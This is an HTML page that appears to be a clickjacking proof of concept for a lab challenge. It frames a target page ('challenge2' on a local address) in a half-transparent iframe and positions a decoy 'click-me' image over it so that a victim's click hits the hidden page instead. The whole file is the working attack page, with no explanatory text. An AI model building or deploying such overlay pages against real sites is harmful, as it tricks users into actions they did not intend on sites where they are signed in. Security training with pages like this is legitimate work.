<html>
<head>
  <style type="text/css" media="screen">
    body {
      background-color: #004466;
    }
    .container {
      width: 960px;
      background-color: #FFF;
      min-height: 500px;
      margin: 0px auto;
      position: relative;
    }
    
    .container2 {
      width: 960px;
      background-color: #FFF;
      height: 0;
      margin: 0px auto;
      position: relative;
    }
    
    #clickjack {
      position: absolute;
      display: inline;
      float: left;
      top: 50px;
      left: 20px;
      z-index: 1;
      background-image: url(http://192.168.1.100:3000/assets/click-me.png);
      height: 30px;
      width: 52px;
    }
    
    #iframe-wrapper {
      opacity: 0.5;
      z-index: 100;
    }
    
  </style>
</head>
<body>
  <div class="container2">
    <div id="clickjack" onclick=""></div>
  </div>
  <div class="container">
    <div id="iframe-wrapper">
      <iframe src="http://192.168.1.100:3000/challenge2" scrolling="no"></iframe>
    </div>
  </div>
</body>
</html>